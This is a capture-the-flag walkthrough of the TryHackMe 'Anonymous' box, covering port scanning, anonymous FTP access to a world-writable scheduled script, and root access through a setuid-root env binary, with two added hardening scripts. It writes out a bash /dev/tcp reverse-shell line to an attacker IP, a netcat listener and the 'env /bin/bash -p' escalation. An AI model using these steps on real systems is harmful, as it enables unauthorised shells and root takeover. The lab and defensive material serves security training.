Intro

Anonymous is a simple and straightforward Linux box where we’ll take advantage of a misconfigured FTP service to get a shell. From there we’ll escalate our privileges through another misconfiguration, this time through a root-owned binary with SUID permissions.

Recon

rustscan -a 10.10.174.130 -- -sC -sV -oA nmap1

PORT    STATE SERVICE     VERSION                       
21/tcp  open  ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts [NSE: writeable]
| ftp-syst:         
|   STAT:                                                
| FTP server status:                                     
|      Connected to ::ffff:10.6.48.252  
|      Logged in as ftp
|      TYPE: ASCII 
|      No session bandwidth limit         
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable            
|_End of status       
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                           
|   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_  256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
                            
Host script results:                                     
| nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:                                                 
|   ANONYMOUS<00>        Flags: <unique><active>
|   ANONYMOUS<03>        Flags: <unique><active>
|   ANONYMOUS<20>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>                                                           
|   WORKGROUP<00>        Flags: <group><active>                                                                    
|   WORKGROUP<1d>        Flags: <unique><active>                                                                   
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery:                                      
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: anonymous 
|   NetBIOS computer name: ANONYMOUS\x00
|   Domain name: \x00
|   FQDN: anonymous
|_  System time: 2021-04-14T12:21:59+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-04-14T12:21:59
|_  start_date: N/A

Enumeration

Nmap detected that the FTP service allows anonymous sessions so let’s start looking around there.

┌──(brian㉿kali)-[~/lab/hacks/tryhackme/Anonymous]
└─$ ftp -v 10.10.6.185 
Connected to 10.10.6.185.
220 NamelessOne's FTP Server!
Name (10.10.6.185:brian): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xrwx    1 1000     1000          314 Jun 04  2020 clean.sh
-rw-rw-r--    1 1000     1000         1032 Jun 01 00:19 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12  2020 to_do.txt
226 Directory send OK.

clean.sh is world-writable, and it writes to removed_files.log. The script also appears to be running as a scheduled job every minute or two, since the last-modified time on the log file keeps advancing.
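The misconfiguration just identified is a script that a scheduled job executes but that any FTP user can rewrite. The following audit, added here as an example and not part of the original write-up, checks a directory for files writable by group or others and strips that write bit; the fixture directory it builds (a 777 clean.sh next to a 644 log, mirroring the listing above) is constructed in a temporary directory, so nothing here touches a real FTP root.

```shell
#!/bin/sh
# Added example: find scripts in an exposed directory that non-owners can modify.
# Runs offline against a constructed fixture; no real FTP root is involved.

# Count regular files under $1 whose mode grants group or other write (g+w or o+w).
# Offending paths go to stderr, the count to stdout.
count_group_other_writable() {
    dir=$1
    n=0
    for f in $(find "$dir" -type f -perm /022 2>/dev/null); do
        echo "writable by non-owner: $f" >&2
        n=$((n + 1))
    done
    echo "$n"
}

# Remediation: remove group/other write so only the owner (and root) can alter a
# file that a scheduled job is going to execute.
harden_scripts() {
    find "$1" -type f -perm /022 -exec chmod go-w {} +
}

# Constructed fixture that mimics the FTP 'scripts' directory from the listing:
# one 777 script (like clean.sh) and one properly permissioned log file.
make_fixture() {
    tmp=$(mktemp -d)
    mkdir "$tmp/scripts"
    printf '#!/bin/sh\nrm -f /tmp/*.tmp\n' > "$tmp/scripts/clean.sh"
    chmod 777 "$tmp/scripts/clean.sh"
    : > "$tmp/scripts/removed_files.log"
    chmod 644 "$tmp/scripts/removed_files.log"
    echo "$tmp"
}

# Stand-alone demonstration: audit the fixture, harden it, audit again.
demo_dir=$(make_fixture)
echo "before hardening: $(count_group_other_writable "$demo_dir") writable file(s)"
harden_scripts "$demo_dir"
echo "after hardening:  $(count_group_other_writable "$demo_dir") writable file(s)"
rm -rf "$demo_dir"
```

On the box itself the same check would be pointed at the FTP root; the other half of the fix is on the vsftpd side, where leaving write_enable and anon_upload_enable off means anonymous sessions can read the share but never replace what the job runs.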

Getting Shell + User Flag

Let’s use get clean.sh to download it to our local box and append a reverse shell line:

/bin/bash -i >& /dev/tcp/10.6.48.252/4444 0>&1

Now we can open up a netcat listener with nc -nlvp 4444 and, back in the FTP window, run send clean.sh to transfer the modified script to the target.

The next time the job runs we’ll catch a shell!

┌──(brian㉿kali)-[~/lab/hacks/tryhackme/Anonymous]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.6.48.252] from (UNKNOWN) [10.10.6.185] 47610
bash: cannot set terminal process group (1458): Inappropriate ioctl for device
bash: no job control in this shell
namelessone@anonymous:~$ id
id
uid=1000(namelessone) gid=1000(namelessone) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

We’ll find the user flag in the user’s home directory.

Privilege Escalation

Let’s search for root SUID binaries to see if there is a quick path to root.

find / -user root -type f -perm /4000 2>/dev/null

We get a long list of files to work through, but the one we’re looking for is /usr/bin/env. Since it is owned by root and has the setuid bit set, env runs with root’s effective UID and hands that on to the bash it launches; the -p flag stops bash from dropping the privilege, so we get a root shell.
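A setuid-root env is not something a stock install ships with, so the defender's version of the find above is to compare the host's setuid list against a known-good baseline and flag the extras. The script below is an added example, not part of the original write-up; its allowlist is a constructed sample rather than a vetted distribution baseline, and the sample scan output it feeds itself is likewise constructed to resemble what the find on this box returns.

```shell
#!/bin/sh
# Added example: flag setuid-root binaries that are not on an allowlist.
# The baseline and sample scan output are constructed for this demonstration.

# Constructed allowlist of setuid-root binaries an Ubuntu-style host normally carries.
# A real baseline would be taken from a clean reference image of the same release.
SUID_BASELINE='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/umount'

# Read candidate paths, one per line, on stdin and print those absent from the baseline.
# grep -Fx matches the whole line literally, so /usr/bin/su never matches /usr/bin/sudo.
unexpected_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        if ! printf '%s\n' "$SUID_BASELINE" | grep -Fqx -- "$path"; then
            printf '%s\n' "$path"
        fi
    done
}

# Live scan: the same find used in the write-up, piped through the comparison.
# Not invoked below so the script runs offline; call it on a real host.
scan_host() {
    find / -user root -type f -perm /4000 2>/dev/null | sort | unexpected_suid
}

# Constructed stand-in for the find output on the box; /usr/bin/env is the outlier.
SAMPLE_SCAN='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/env'

echo "unexpected setuid-root binaries:"
printf '%s\n' "$SAMPLE_SCAN" | unexpected_suid
```

Anything the comparison reports is either a deliberate local addition that belongs in the baseline or a misconfiguration to undo; for this box the remediation is chmod u-s /usr/bin/env, after which the env /bin/bash -p trick yields an ordinary user shell.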

namelessone@anonymous:~$ env /bin/bash -p -i
env /bin/bash -p -i
bash: cannot set terminal process group (1458): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.4# id
id
uid=1000(namelessone) gid=1000(namelessone) euid=0(root) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
bash-4.4# cd /root && ls -l
cd /root && ls -l
total 4
-rw-r--r-- 1 root root 33 May 11  2020 root.txt
bash-4.4# wc -c root.txt
wc -c root.txt
33 root.txt